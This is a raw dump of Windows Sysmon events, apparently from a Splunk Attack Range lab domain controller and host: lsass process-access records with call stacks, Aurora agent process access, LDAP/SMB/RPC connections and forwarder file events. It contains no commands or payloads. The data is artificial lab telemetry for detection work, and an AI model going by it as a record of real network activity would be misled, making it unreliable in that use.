12:23:11.265{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.216{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3CBBFD050AC153ABC6FFC0242558EF6,SHA256=2CCCB81745BC04A59AAA0C1D422EC17EC9A0A16E62C90F9BD3890C12392D68B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:12.707{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E39B12B670A0F96EE4790713C761C0F2,SHA256=661B4762507E0D95280B993BFA3B3E203AD300E87D1B13C4D963202303A36AC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044011Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:12.672{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044010Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:12.672{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044009Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:12.600{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50A0AA5B9554C28CAF0A6735846DC355,SHA256=F4A79E794BA2B5CAE50F4E4036FD3F57B9EF47558DEEC18721A74014A41D5AD2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044008Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:12.500{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044007Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:12.500{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044006Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:12.500{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000044005Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.746{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56366-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000044004Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.745{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56366-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000044003Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.643{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56365-false10.0.1.12-8000- 354300x800000000000000044002Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.313{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9810:3ff4:6c3:ffff-57492-truee000:fc:1800:6100:7328:22:2f:3e-5355llmnr 354300x800000000000000044001Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.313{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local57492-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x800000000000000044000Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.296{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56364-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local135epmap 354300x800000000000000043999Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.296{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56364-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local135epmap 10341000x800000000000000043998Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:12.260{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000016796Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:12.217{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64BBE78B0F77ED923AA6CFA8286DA500,SHA256=6CCA847031C97F15B3DE1B0895A2ABA0570DAF09331F19EA84BA21EF296646B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016795Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:12.007{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-035MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044017Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.977{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56368-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000044016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.977{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56368-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000044015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.135{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56367-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000044014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.135{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56367-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000044013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:13.368{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57E69A1D5537436AE5C900EDC80D3A67,SHA256=B87269B81D688EA1773066C983C57FC8FE59E98F1278393DDDCE5B6BBEEB5300,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016798Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:12.112{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50111-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016797Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:13.313{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEB1A0B1346D0FA3B0EDC1272CD7B97C,SHA256=BE5D46E37C465C74CDE510B36F108265414B41ED1C2DAAB695993EC27D37D2FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.965{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.962{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000044051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.958{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.957{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.957{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.956{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.955{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.953{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.949{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.947{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.944{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:14.926{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 